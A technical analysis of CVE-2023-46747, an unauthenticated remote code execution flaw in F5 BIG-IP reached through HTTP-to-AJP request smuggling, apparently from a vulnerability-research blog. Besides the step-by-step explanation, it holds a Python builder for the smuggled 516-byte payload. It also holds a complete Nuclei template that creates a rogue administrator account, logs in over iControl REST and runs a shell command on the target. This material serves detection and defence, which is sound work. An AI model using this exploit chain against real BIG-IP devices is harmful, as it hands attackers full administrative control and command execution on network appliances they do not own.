F5 BIG-IP Unauth RCE via AJP Smuggling (CVE-2023-46747) - Technical Analysis
Description:
CVE-2023-46747 is a critical vulnerability in the F5 BIG-IP Configuration Utility (TMUI): a request smuggling bug on the Apache JServ Protocol (AJP) path between Apache httpd and Tomcat. It allows an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. The vulnerability was discovered and reported by Thomas Hendrickson and Michael Weber of Praetorian. It has a CVSS score of 9.8 (critical).
Technical Details:
The attack exploits HTTP-to-AJP request smuggling caused by Apache httpd and Tomcat's AJP connector disagreeing on how to handle the Transfer-Encoding and Content-Length headers. Here's a breakdown:
1. Origin of the Discrepancy: Apache httpd receives an HTTP request carrying a "Transfer-Encoding: chunked, chunked" header, dechunks the body and forwards the request to Tomcat over AJP, passing the header along unchanged. Tomcat's AJP processor only treats a request as chunked when the header value is exactly "chunked", so it falls back to Content-Length. That header is absent, so Tomcat assumes a body length of 0 and expects no body at all.
2. Resulting Desynchronization: The AJP Data packet that carries the POST body therefore arrives while Tomcat is waiting for the next request on the connection, and is parsed as a fresh AJP Forward Request packet rather than as body data.
3. Exploiting the Gap: The POST body must be exactly 516 bytes (0x204) long. mod_proxy_ajp prefixes the body inside each Data packet with a two-byte length field; Tomcat, now reading that packet as a new message, interprets those two bytes as the message type and the HTTP method, and 0x02 0x04 is exactly "Forward Request" followed by "POST". The attacker-controlled body is then parsed as the remainder of a Forward Request (protocol, URI, headers, attributes), which lets the attacker address specific /tmui/ endpoints on the AJP port directly and evade the initial authentication checks.
4. Bypassing Further Checks: Many /tmui/* pages perform additional authentication checks. Getting past them requires two things, both of which the attacker controls in a forged Forward Request:
- Setting the REMOTE_USER attribute, which AJP carries natively (the remote_user request attribute, code 0x03).
- Supplying a REMOTEROLE request header with any valid integer role id, which completes the authentication bypass.
5. Gaining Full Access: The remaining task is to find a request that fits in 516 bytes and either grants admin access or yields remote code execution. One such request creates an administrator user through the BIG-IP UI via the /tmui/Control/form endpoint. The original form submission was too large, but removing redundant parameters brought it under the 516-byte limit.
6. Overcoming Final Hurdles: The user-creation action has a CSRF check: the _bufvalue parameter must equal the base64-encoded SHA1 digest of the Tmui-Dubbuf header value concatenated with the _timenow parameter. Because the attacker controls the whole request, both inputs are known in advance and the digest can be precomputed. The Tmui-Dubbuf header also doubles as padding: extra "B"s are appended to it until the packet is exactly 0x204 bytes long.
7. Endgame: TL;DR: an attacker can create an administrator account without any prior authentication. With that account they can use built-in F5 functionality (the iControl REST bash utility) to run Bash commands, which is full remote code execution.
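To make the framing concrete, here is an added example written for this page (it is not Praetorian's or ProjectDiscovery's code) that builds the smuggled body from the pieces described in steps 1 to 6 and then reads it back the way Tomcat does. The AJP13 type, method, header and attribute codes are taken from the protocol definition, not from the page; the form parameters are a constructed placeholder rather than the real user-creation form (that one is in the Nuclei template on this page); and only the parts of mod_proxy_ajp framing the attack depends on are modelled. Nothing is sent over the network.

```python
"""Build the HTTP-to-AJP smuggling body and parse it back as Tomcat would,
to show why the body has to be exactly 0x204 bytes long. Offline only."""
import base64
import hashlib
import struct
from urllib.parse import urlencode

# AJP13 protocol constants (from the protocol definition, not from the page).
JK_AJP13_FORWARD_REQUEST = 0x02
SC_M_POST = 0x04
SC_REQ_HOST = 0xA00B        # coded form of the "Host" header name
SC_A_REMOTE_USER = 0x03     # request attribute that sets REMOTE_USER
SC_A_QUERY_STRING = 0x05
SC_A_ARE_DONE = 0xFF
TARGET_LEN = 0x204          # 516: as a big-endian u16 this is 0x02 0x04 = Forward Request, POST

# Constructed placeholder form; not a real TMUI handler. The admin-creation
# parameters used in the wild are in the Nuclei template on this page.
EXAMPLE_FORM = {"handler": "/tmui/example/handler", "finished": "x"}


def ajp_string(s: str) -> bytes:
    """AJP string: big-endian 2-byte length, raw bytes, NUL terminator."""
    data = s.encode()
    return struct.pack(">H", len(data)) + data + b"\x00"


def csrf_bufvalue(dubbuf: str, timenow: str) -> str:
    """The TMUI check described above: _bufvalue == base64(SHA1(Tmui-Dubbuf || _timenow))."""
    digest = hashlib.sha1((dubbuf + timenow).encode()).digest()
    return base64.b64encode(digest).decode()


def forward_request_tail(uri, headers, remote_user, query):
    """A Forward Request minus its first two bytes (type, method). On the wire those
    two bytes are supplied by the Data packet's own length field, see ajp_data_packet()."""
    out = ajp_string("HTTP/1.1") + ajp_string(uri)
    out += ajp_string("127.0.0.1") + ajp_string("localhost") + ajp_string("localhost")  # remote_addr, remote_host, server_name
    out += struct.pack(">HB", 80, 0)                        # server_port, is_ssl
    out += struct.pack(">H", len(headers))
    for name, value in headers:
        out += struct.pack(">H", SC_REQ_HOST) if name.lower() == "host" else ajp_string(name)
        out += ajp_string(value)
    out += bytes([SC_A_REMOTE_USER]) + ajp_string(remote_user)   # satisfies the REMOTE_USER check
    out += bytes([SC_A_QUERY_STRING]) + ajp_string(query)
    return out + bytes([SC_A_ARE_DONE])


def build_post_body(uri, form, remote_user="admin", remote_role="0", timenow="a"):
    """Grow the Tmui-Dubbuf padding until the tail is exactly 0x204 bytes. The CSRF
    token changes with every pad length but keeps a constant size, so each extra 'B'
    adds exactly one byte and the target is always reachable if the form fits."""
    for pad in range(1, 1024):
        dubbuf = "B" * pad
        params = {"_timenow": timenow, **form, "_bufvalue": csrf_bufvalue(dubbuf, timenow)}
        headers = [("Tmui-Dubbuf", dubbuf), ("REMOTEROLE", remote_role), ("Host", "localhost")]
        tail = forward_request_tail(uri, headers, remote_user, urlencode(params))
        if len(tail) == TARGET_LEN:
            return tail
        if len(tail) > TARGET_LEN:
            raise ValueError("form does not fit in 0x204 bytes; drop parameters")
    raise ValueError("unreachable: padding step is one byte")


def http_request(host: str, body: bytes) -> bytes:
    """The outer HTTP request Apache sees: doubled chunked encoding, one 0x204-byte chunk."""
    head = (f"POST /tmui/login.jsp HTTP/1.1\r\nHost: {host}\r\n"
            "Transfer-Encoding: chunked, chunked\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n")
    return head.encode() + b"%x\r\n" % len(body) + body + b"\r\n0\r\n\r\n"


def ajp_data_packet(body: bytes) -> bytes:
    """What mod_proxy_ajp puts on the wire for a request body: magic 0x1234,
    packet length, then the body prefixed with its own 2-byte length."""
    return b"\x12\x34" + struct.pack(">HH", len(body) + 2, len(body)) + body


def parse_as_forward_request(packet: bytes) -> dict:
    """Tomcat's view once it believes no body is pending: the Data packet IS a request,
    and the body-length field becomes the type and method bytes."""
    if packet[:2] != b"\x12\x34":
        raise ValueError("bad AJP magic")
    (length,) = struct.unpack(">H", packet[2:4])
    msg = packet[4:4 + length]
    pos = 2

    def read_string():
        nonlocal pos
        (n,) = struct.unpack(">H", msg[pos:pos + 2])
        s = msg[pos + 2:pos + 2 + n].decode()
        pos += 2 + n + 1            # Tomcat skips the terminating NUL without checking it
        return s

    return {"type": msg[0], "method": msg[1], "protocol": read_string(), "uri": read_string()}


if __name__ == "__main__":
    body = build_post_body("/tmui/Control/form", EXAMPLE_FORM)
    print(len(body), hex(len(body)))
    print(parse_as_forward_request(ajp_data_packet(body)))
    print(http_request("bigip.example", body)[:160])
```

Running it shows the size field of the Data packet (0x02 0x04) being consumed as the type and method of a POST Forward Request, and the remaining 516 bytes being parsed as protocol, URI, headers and attributes. The number of padding "B"s is solved by iteration here because the form differs from the template's; with the real user-creation form the template lands on eleven.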
Nuclei Template
The ProjectDiscovery research team compiled a template so that all Nuclei users can check their attack surface for hosts exploitable via CVE-2023-46747. It was developed within 5 days of the CVE notification, and just 24 hours after the public disclosure of the vulnerability details.
```yaml
id: CVE-2023-46747

info:
  name: F5 BIG-IP - Unauthenticated RCE via AJP Smuggling
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.
  reference:
    - https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
    - https://my.f5.com/manage/s/article/K000137353
  tags: cve,cve2023,rce,f5,bigip,unauth,ajp,smuggling,intrusive

# username and password are kept hex-encoded so they can be spliced into the
# hex-encoded AJP payload below; hex_decode(username) is the actual account name.
variables:
  username: "{{hex_encode(rand_base(5))}}"
  password: "{{hex_encode(rand_base(12))}}"
  password2: "{{rand_base(14)}}"

http:
  # Request 1: the smuggled AJP Forward Request. The single 0x204-byte chunk is the
  # hex-encoded admin-user creation form for /tmui/Control/form, carrying the
  # Tmui-Dubbuf padding, the REMOTEROLE header and the remote_user attribute.
  - raw:
      - |+
        POST /tmui/login.jsp HTTP/1.1
        Host: {{Hostname}}
        Transfer-Encoding: chunked, chunked
        Content-Type: application/x-www-form-urlencoded

        204
        {{ hex_decode(concat("0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d",username,"266e616d655f6265666f72653d267061737377643d",password,"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00")) }}
        0

    unsafe: true

  # Requests 2-4: set a fresh password for the new account over iControl REST,
  # log in (trying both passwords), then run a command with the returned token.
  - raw:
      - |+
        PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}
        Content-Type: application/json

        {"password": "{{password2}}"}

      - |+
        POST /mgmt/shared/authn/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{hex_decode(username)}}", "password":"{{pass}}"}

      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: {{Hostname}}
        X-F5-Auth-Token: {{token}}
        Content-Type: application/json

        {"command":"run","utilCmdArgs":"-c id"}

    payloads:
      pass:
        - '{{password2}}'
        - '{{hex_decode(password)}}'
    skip-variables-check: true
    stop-at-first-match: true

    extractors:
      - type: regex
        part: body_2
        name: token
        group: 1
        regex:
          - "([A-Z0-9]{26})"
        internal: true

      - type: regex
        part: body_3
        group: 1
        regex:
          - "\"commandResult\":\"(.*)\""

      - type: dsl
        dsl:
          - '"Username:" + hex_decode(username)'
          - '"Password:" + pass'
          - '"Token:" + token'
    matchers:
      - type: word
        words:
          - "commandResult"
          - "uid="
        condition: and
```
Timeline:
- October 26, 2023: Initial advisory and limited details for CVE-2023-46747 were published.
- October 30, 2023: The Nuclei Template was released by the ProjectDiscovery Research Team.
- October 31, 2023: Full disclosure of the vulnerability was publicly shared by Praetorian.
Remediation:
Patching is the strongly recommended course of action to remediate this vulnerability. F5 has also provided mitigation guidance for cases where patching cannot be performed immediately; review F5 article K000137353 (referenced below) for the recommended mitigation steps and their warnings. In particular, F5 cautions that the provided mitigation script must NOT be used on BIG-IP versions prior to 14.1.0.
References:
- Help Net Security: F5 fixes critical BIG-IP vulnerability, PoC is public (CVE-2023-46747)
- Tenable Blog: CVE-2023-46747: Critical Authentication Bypass Vulnerability
- NVD: CVE-2023-46747
- F5 Security Advisory K000137353: BIG-IP Configuration utility unauthenticated remote code execution vulnerability CVE-2023-46747
- Praetorian Blog: The Discovery of F5 BIG-IP Vulnerability CVE-2023-46747